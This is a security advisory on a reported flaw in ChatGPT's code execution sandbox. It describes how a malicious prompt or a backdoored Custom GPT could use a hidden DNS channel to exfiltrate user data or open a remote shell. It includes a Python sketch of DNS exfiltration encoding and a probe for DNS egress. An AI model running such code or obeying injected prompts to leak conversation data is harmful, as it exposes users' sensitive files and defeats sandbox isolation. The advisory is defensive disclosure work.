CVE Watch
TH-05 (Severity: High)

ChatGPT Code Execution Runtime — Hidden DNS Outbound Channel Enables Data Exfiltration

Tags: chatgpt, data-exfiltration, sandbox-escape, dns, agentic-security

Check Point Research discovered that ChatGPT's code execution runtime — documented by OpenAI as a secure environment that "cannot generate direct outbound network requests" — contained a hidden DNS-based communication channel to the public internet.

A single malicious prompt could activate this channel to silently exfiltrate user messages, uploaded files, and other sensitive conversation content to attacker-controlled servers, bypassing OpenAI's stated safeguards. The same hidden path could be used to establish a remote shell inside the Linux runtime that executes generated code, and a backdoored Custom GPT could abuse the same weakness to harvest data from any user who interacted with it.
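For context on why a DNS channel defeats an "no outbound requests" guarantee: DNS exfiltration typically encodes stolen bytes into subdomain labels of an attacker-controlled zone, so the runtime never needs a direct socket to the attacker, only the ability to trigger name resolution. A minimal sketch of the general technique follows; the zone name and encoding are illustrative assumptions, not details from the Check Point write-up:

```python
# Generic illustration of DNS-based exfiltration encoding.
# The zone below is hypothetical, NOT the actual research payload.
import binascii

MAX_LABEL = 63  # RFC 1035 limits each DNS label to 63 octets
ATTACKER_ZONE = "exfil.example.com"  # hypothetical attacker-controlled zone

def encode_queries(data: bytes, zone: str = ATTACKER_ZONE) -> list[str]:
    """Hex-encode data and split it into DNS-safe subdomain labels."""
    hexed = binascii.hexlify(data).decode("ascii")
    chunks = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    # Each lookup like "<seq>.<chunk>.exfil.example.com" is answered by the
    # attacker's authoritative nameserver, which logs the chunks and
    # reassembles the data, even when HTTP egress is blocked.
    return [f"{seq}.{chunk}.{zone}" for seq, chunk in enumerate(chunks)]

queries = encode_queries(b"secret contract text")
```

Because resolution is delegated to the platform's recursive resolver, this traffic looks like ordinary name lookups unless DNS queries themselves are filtered or blocked at the network layer.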

Any enterprise or individual that shared sensitive data (contracts, medical records, source code, financial documents) in ChatGPT sessions prior to February 20, 2026 was operating under a false isolation assumption — the documented sandbox guarantee was not technically enforced at the network layer.

Immediate action: Treat any sensitive data shared with ChatGPT before February 20, 2026 as potentially exposed; implement strict enterprise policies requiring AI platforms to provide verifiable (not just documented) network isolation before handling regulated data; do not rely on vendor documentation alone for sandbox isolation claims.
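One way to make isolation verifiable rather than merely documented is to probe it from inside the runtime: attempt to resolve an external hostname and treat success as an isolation failure. A minimal probe sketch, assuming a Python-capable runtime; the hostname is an arbitrary example:

```python
import socket

def dns_egress_blocked(hostname: str = "example.com") -> bool:
    """Probe whether the runtime can resolve external names.

    Returns True if resolution fails (DNS egress appears blocked at the
    network layer) and False if it succeeds (a covert DNS channel would
    be possible). Resolver timeouts are governed by the OS, not this code.
    """
    try:
        socket.getaddrinfo(hostname, 443)
        return False  # resolution worked: outbound DNS is reachable
    except OSError:   # socket.gaierror is a subclass of OSError
        return True   # resolution failed: isolation is enforced

# In a runtime with genuinely enforced isolation, this should print True.
print(dns_egress_blocked())
```

A probe like this only demonstrates behavior at one moment; for regulated data, pair it with network-layer controls (e.g. an egress policy that drops DNS to non-approved resolvers) rather than relying on in-sandbox checks alone.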